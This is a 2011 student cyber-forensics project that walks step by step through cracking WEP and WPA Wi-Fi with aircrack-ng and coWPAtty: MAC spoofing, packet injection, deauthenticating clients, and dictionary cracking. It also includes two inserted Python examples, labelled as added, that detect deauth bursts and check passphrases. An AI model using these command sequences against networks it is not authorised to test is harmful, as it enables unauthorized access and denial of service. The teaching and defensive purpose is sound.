Team_Epsilon_Final_Video_Project

Team Epsilon
Final Video Team Project
April 13, 2011
Team Members: Ian Levy, Anthony Kuny, Jennifer Strawn, Jordan Godfrey, Mary Viloria
Emails: Ian.t.levy@gmail.com, anthonykuny@gmail.com, jls5538@psu.edu, jgg5047@psu.edu, makavi963@gmail.com
Table of Contents
I. Introduction
II. Written Instructions
  A. Cracking WEP
  B. Cracking WPA
  C. CoWPAtty
III. Step-by-step Instructions
  A. Cracking WEP
  B. Cracking WPA
  C. Cracking WPA with CoWPAtty
IV. References
I. Introduction
Wireless cracking is the part of penetration testing that gains access to wireless networks. Criminals usually gain access without authorization or through social engineering. For computer and cyber forensics this applies to criminals using password cracking and possibly altering important files. We will set up a scenario in which a criminal has a WEP/WPA/2 network in range and is attempting to gain unauthorized access to it. We will do this using BackTrack 4 R2, an operating system designed for penetration testers that can easily be installed to run from a USB drive. Pre-installed in BackTrack is a program suite called aircrack-ng, which is used for password cracking by means of packet injection, dictionary and brute force attacks. Through this we will show, in detailed steps, how weak encryption standards can easily be cracked. We will also show how strong encryption standards can easily be cracked when the password is weak. For cracking WEP we will use packet injection to increase the number of initialization vectors exchanged between the host and the router. From those we will be able to obtain the wireless key in hex form, which can be entered instead of the actual text password to gain access. For WPA/2 we will obtain a handshake from the router that can be fed to offline password cracking programs, which attempt either a brute force attack or a dictionary attack to find the password. This method requires the actual text of the password. There are plenty of offline password cracking programs available, but as a group we will focus on the aircrack-ng suite and coWPAtty.
This fits into cyber forensics because wireless cracking can be done by criminals trying to gain access to networks in order to obtain information from them. In cyber forensics, our job is to retrace their steps and gather the information and data that show how these criminals gained access to the networks, and to try to establish the reasoning behind their actions. We will use cyber forensics to collect, preserve and present this data as you would in a legal setting. From this perspective, the first reason this is important is to demonstrate how the cracking is accomplished, but overall it is useful to any person who intends to investigate network security. Not only should the steps for gaining access to wireless networks be known; we also believe it is useful to learn how to keep computer information private and secure. The first step is to make sure a firewall is installed and working correctly, and to turn on automatic updates so that the computer is always current. Next, it is important to ensure that the firewall's settings match how the computer is used. Lastly, it is imperative to have strong, substantial passwords so that the network as well as the individual computer is protected to the best of the user's ability. To test these changes to the network, the first step is to look for leaks by running a leak test with a free online tool, for example Gibson Research Corporation's LeakTest. Understanding these steps and the ways to prevent wireless encryption cracking is just as important, because it protects any computer and is essential to keeping privacy and confidentiality.
II. Written Instructions
In cyber forensics, understanding how networks are broken into is extremely important. It is essential for the analyst because it allows them to interpret the router logs and recognise that an increase in packets may indicate an attack, either a denial of service or an attempt to increase the number of initialization vectors in order to crack WEP encryption. This video documentation will help explain why this matters and will walk through each command and its purpose while cracking WEP and WPA encryption.
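Added example, not part of the team's project: a small Python detector for the two traffic patterns this section says an analyst should recognise, a burst of deauthentication frames and a sudden flood of data frames from a single station. The log record format, the access point and client MAC addresses are constructed; only the spoofed address 00:11:22:33:44:55 is taken from the steps that follow.

```python
from collections import Counter

# Constructed monitor-mode frame log (not from the original document): one record per
# 802.11 frame as "<seconds>,<frame type>,<sender MAC>,<receiver MAC>".
AP = "00:24:b2:11:22:33"        # constructed BSSID of the network under attack
CLIENT = "00:1e:52:aa:bb:cc"    # constructed legitimate client of that AP
INJECTOR = "00:11:22:33:44:55"  # the spoofed MAC used in the document's aireplay-ng steps


def build_sample_log(with_attack=True):
    """Normal traffic, then (optionally) a deauth burst and a replayed data burst."""
    lines = [f"{i * 0.5:.3f},data,{CLIENT},{AP}" for i in range(10)]
    if with_attack:
        # aireplay-ng -0 forges deauth frames with the AP as the apparent sender.
        lines += [f"{5.0 + i * 0.01:.3f},mgmt-deauth,{AP},{CLIENT}" for i in range(20)]
        # aireplay-ng -3 replays captured ARP requests from the injector's own MAC.
        lines += [f"{6.0 + i * 0.002:.3f},data,{INJECTOR},{AP}" for i in range(300)]
    return "\n".join(lines) + "\n"


def parse_log(text):
    """Parse records into (time, frame_type, sender, receiver) tuples."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        t, ftype, src, dst = line.split(",")
        records.append((float(t), ftype, src.lower(), dst.lower()))
    return records


def detect(records, window=1.0, deauth_limit=5, data_limit=100):
    """Count frames per sender in fixed-size windows and flag bursts.

    A real AP sends at most a handful of deauths; a burst from one sender is the
    aireplay-ng -0 pattern. Hundreds of data frames per second from one station is the
    rapid data-column growth the WEP section describes (aireplay-ng -3).
    Returns (kind, sender, window_index, count) tuples.
    """
    deauth, data = Counter(), Counter()
    for t, ftype, src, _dst in records:
        bucket = (src, int(t // window))
        if ftype == "mgmt-deauth":
            deauth[bucket] += 1
        elif ftype == "data":
            data[bucket] += 1
    alerts = [("deauth-burst", s, w, n) for (s, w), n in sorted(deauth.items()) if n >= deauth_limit]
    alerts += [("data-burst", s, w, n) for (s, w), n in sorted(data.items()) if n >= data_limit]
    return alerts
```

Thresholds are deliberately conservative; tune the window and limits to the baseline of the network being monitored.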
A. Cracking WEP
First, in order to crack WEP (Wired Equivalent Privacy), we need to do some housekeeping. We will boot into BackTrack, a Linux-based operating system, and then launch Konsole, which opens the command line in BackTrack. We will use the aircrack-ng suite to break into a WEP-encrypted network. Within Konsole we will find out which devices are available to us.
In order to do this we will use the command airmon-ng. As you can see we have a couple of devices, wlan0 and wlan1; we will use wlan0. The next task is to put the wireless card in monitor mode and spoof the MAC address to make the later commands easier. In order to change the MAC address we first need to put the interface down. We will do this with the command ifconfig wlan0 down: ifconfig is the command, wlan0 is the interface and down is the option that brings the interface down. Then we will change the MAC address with the command macchanger --mac 00:11:22:33:44:55 wlan0: macchanger is the command, --mac is the option, the address given is the new desired MAC address and wlan0 is the interface to change.
Now we will put the card in monitor mode with the command airmon-ng start wlan0: airmon-ng is the command, wlan0 is the interface and start is the option that starts monitoring on the interface. As you can see, airmon-ng creates another interface, mon0. This is because of the drivers that make this particular wireless card compatible with the aircrack-ng suite, which is already installed when BackTrack boots. Now we will scan for any vulnerable WEP-encrypted networks with the command airodump-ng mon0: airodump-ng is the command, and we are telling it to use mon0, the new interface we created, to scan all the channels for networks in range. As you can see, all the networks in range appear as the wireless card hops across the channels. To stop the scan, hit Ctrl+C. Now that we have found a vulnerable network we are going to sniff and capture the traffic at the access point. We will do this with airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface). -c is the channel the vulnerable network is broadcasting on, -w is the name you want to give the .cap file for cracking later, --bssid is the MAC address of the vulnerable access point, and mon0 is the interface we are using to sniff the packets. Now we can see whether any clients are connected to the vulnerable network, and we can collect the data being sent between the connected clients.
Next we fake-associate our interface with the access point of the vulnerable network. First we open another tab within the Konsole window. We then send the fake association packets with the aireplay-ng command: aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 mon0, where -a is the BSSID of the access point, -h is the MAC address we changed our interface to and mon0 is our interface. As you can see we were successful; Konsole reports "Association successful :-)". With that confirmation we are able to perform packet injection against the vulnerable network. We could wait and not make our presence known to any connected clients, but we don't have time to wait. Packet injection could potentially amount to a denial of service, because we are sending so many packets in order to increase the data we are trying to capture. This usually takes a few minutes at most and shouldn't be too disruptive. Now for the actual command that makes all this happen. We use aireplay-ng again: aireplay-ng -3 -b (the MAC address of the vulnerable access point) -h 00:11:22:33:44:55 mon0, where -3 is the option that sends the fake packets, -b is the access point's MAC address, -h is our MAC address and mon0 is our interface. With this command we are generating network traffic to speed up the crack. When we switch back to the previous tab, where we are sniffing the network, we can see the data column increasing rapidly.
Now that we have confirmed that packets are being injected, we will open another tab to crack the vulnerable network. In the new tab we start cracking with the aircrack-ng command: aircrack-ng -b (MAC address of the vulnerable access point) filename-01.cap, where filename-01.cap is the capture file created with the -w option. As you can see, aircrack-ng is brute-forcing the network key of the vulnerable network. When the command successfully finds the network key it prints KEY FOUND with the key in hexadecimal form. You will be able to connect to the vulnerable network by dropping the colons and entering the hex string as the network key.
B. Cracking WPA
WPA stands for Wi-Fi Protected Access. We will use commands similar to those we used to crack WEP, but instead of aircrack-ng brute-forcing by itself we need to test the password with a dictionary attack. A dictionary attack uses a text file compiled from all the possible network keys you think might crack the password. In some cases a dictionary attack may use only words found in a dictionary, but that is considered a weak word list. We will use the aircrack-ng suite to break into a WPA-encrypted network. Within Konsole we will find out which devices are available to us. In order to do this we will use the command airmon-ng. As you can see we have a couple of devices, wlan0 and wlan1; we will use wlan0. The next task is to put the wireless card in monitor mode and spoof the MAC address to make the later commands easier. In order to change the MAC address we first need to put the interface down. We will do this with the command ifconfig wlan0 down: ifconfig is the command, wlan0 is the interface and down is the option that brings the interface down. Then we will change the MAC address with the command macchanger --mac 00:11:22:33:44:55 wlan0: macchanger is the command, --mac is the option, the address given is the new desired MAC address and wlan0 is the interface to change.
Now we will put the card in monitor mode with the command airmon-ng start wlan0: airmon-ng is the command, wlan0 is the interface and start is the option that starts monitoring on the interface. As you can see, airmon-ng creates another interface, mon0. This is because of the drivers that make this particular wireless card compatible with the aircrack-ng suite, which is already installed when BackTrack boots. Now we will scan for any WPA-encrypted networks with the command airodump-ng mon0: airodump-ng is the command, and we are telling it to use mon0, the new interface we created, to scan all the channels for networks in range. As you can see, all the networks in range appear as the wireless card hops across the channels. To stop the scan, hit Ctrl+C. Now that we have found a WPA network we are going to sniff and capture the traffic at the access point. We will do this with airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface). -c is the channel the target network is broadcasting on, -w is the name you want to give the .cap file for cracking later, --bssid is the MAC address of the target access point, and mon0 is the interface we are using to sniff the packets. Now we can see whether any clients are connected to the network, and we can collect the data being sent between the connected clients. Next we need a connected client that we can force to re-authenticate so that we can capture the handshake. Once we have captured the handshake we can perform the crack offline. We open a text editor and copy down the connected client's MAC address for use in the next command. Now we open another tab and use the command aireplay-ng -0 1 -a (MAC address of the access point) -c (MAC address of the connected client). The -0 option is the deauthentication command and the number after it is how many deauthentication packets to send.
Once the command has been entered, we switch back to the first tab and notice in the top right-hand corner that we have successfully captured the four-way handshake. Now we stop sniffing the network by hitting Ctrl+C. Then we use the aircrack-ng command to run through a wordlist to crack the password. We enter aircrack-ng -w (file location of the wordlist) -b (MAC address of the access point we are attempting to gain access to) followed by the file location of the captured four-way handshake. aircrack-ng then runs through the wordlist and tries to crack the WPA password. As you can see we are successful, and the password is "password".
C. CoWPAtty
Now we will use coWPAtty, an alternative method of WPA cracking. We type cowpatty -r (the capture file containing the four-way handshake) -f (the file location of the word list to use for cracking the password) -s (the SSID of the network we are trying to access) and press Enter. coWPAtty runs through the word list and tries to find the password; as you can see, it successfully found the word "password".
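Sections B and C both end with a strong encryption standard falling to the passphrase "password". Added example, not part of the team's project: a Python pre-check a network owner can run on a proposed WPA passphrase before it goes into the router, applying the WPA-PSK length and character rules and testing whether the passphrase, or a simply mangled form of it, sits in the kind of word list fed to aircrack-ng -w or cowpatty -f. The word list here is a constructed stand-in; a real check would load the same lists an attacker would.

```python
import string

# Constructed mini word list standing in for a cracking dictionary (assumption: in
# practice load the real lists, e.g. the one used with aircrack-ng -w / cowpatty -f).
SAMPLE_WORDLIST = {"password", "letmein", "qwerty", "welcome", "linksys"}

# Undo the cheap character substitutions that cracking rule sets apply to dictionary words.
LEET = str.maketrans("@$0345!", "asoeasi")


def normalize(candidate):
    """Lower-case, strip trailing digits/punctuation, then undo leet substitutions."""
    stripped = candidate.lower().rstrip(string.digits + string.punctuation)
    return stripped.translate(LEET)


def check_wpa_passphrase(candidate, wordlist=SAMPLE_WORDLIST):
    """Return a list of problem codes; an empty list means the passphrase passes.

    Rules: a WPA-PSK passphrase is 8 to 63 printable ASCII characters (codes 32-126),
    and anything an offline dictionary run would hit, even after simple mangling,
    is treated as already broken.
    """
    problems = []
    if not 8 <= len(candidate) <= 63:
        problems.append("length")
    if any(not 32 <= ord(c) <= 126 for c in candidate):
        problems.append("charset")
    if candidate.lower() in wordlist or normalize(candidate) in wordlist:
        problems.append("wordlist")
    return problems
```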
III. Step-by-step Instructions
A. Cracking WEP
*Hit Enter after every step except 6 and 8
Step 1: Type airmon-ng
Step 2: Type ifconfig wlan0 down
Step 3: Type macchanger --mac 00:11:22:33:44:55 wlan0
Step 4: Type airmon-ng start wlan0
Step 5: Type airodump-ng mon0
Step 6: To stop the scan, hit Ctrl+C.
Step 7: Type airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)
Step 8: Open another tab in Konsole
Step 9: Type aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 mon0
Step 10: Once you see this screen, you have successfully associated with the access point.
Step 11: Type aireplay-ng -3 -b (the MAC address of the vulnerable access point) -h 00:11:22:33:44:55 mon0
Step 12: Type aircrack-ng -b (MAC address of the vulnerable access point) filename-01.cap, where filename-01.cap is the capture file created with the -w option. When the command successfully finds the network key it prints KEY FOUND with the key in hexadecimal form.
Step 13: You will be able to connect to the vulnerable network by dropping the colons and entering the hex string as the network key.
B. Cracking WPA
*Hit Enter after every step except 6 and 8
Step 1: Type airmon-ng
Step 2: Type ifconfig wlan0 down
Step 3: Type macchanger --mac 00:11:22:33:44:55 wlan0
Step 4: Type airmon-ng start wlan0
Step 5: Type airodump-ng mon0
Step 6: To stop the scan, hit Ctrl+C.
Step 7: Type airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)
Step 8: Open another tab in Konsole
Step 9: Type aireplay-ng -0 1 -a (MAC address of the access point) -c (MAC address of the connected client). The -0 option is the deauthentication command and the number after it is how many packets to send.
Step 10: Type aircrack-ng -w (file location of the wordlist) -b (MAC address of the access point we are attempting to gain access to) followed by the file location of the captured four-way handshake.
Step 11: If the password is in the word list, aircrack-ng will return it. If not, it will say "Password not in dictionary" and you will need to try another list.
C. Cracking WPA with CoWPAtty
Note: This is used after you have captured the four-way handshake.
Step 1: Enter cowpatty -r (captured four-way handshake) -f (file location of the word list) -s (network SSID)
Step 2: CoWPAtty will return the password if it is in the dictionary provided; if not, it states that the password was not in the dictionary file and suggests expanding your list.
IV. References
IT Security Editors. "10 Steps To Securing Firewalls." ITsecurity.com, 22 Jan. 2007. Web. 4 Apr. 2011. <http://www.itsecurity.com/features/more-secure-firewall-012207/>.
"How To Crack WEP and WPA Wireless Networks." SpeedGuide.net: The Broadband Guide. Web. 28 Feb. 2011. <http://www.speedguide.net/articles/how-tocrack-wep-and-wpa-wireless-networks-2724>.
Tews, Erik, Ralf-Philipp Weinmann, and Andrei Pyshkin. "Breaking 104 Bit WEP in Less than 60 Seconds." Web. <http://eprint.iacr.org/2007/120.pdf>.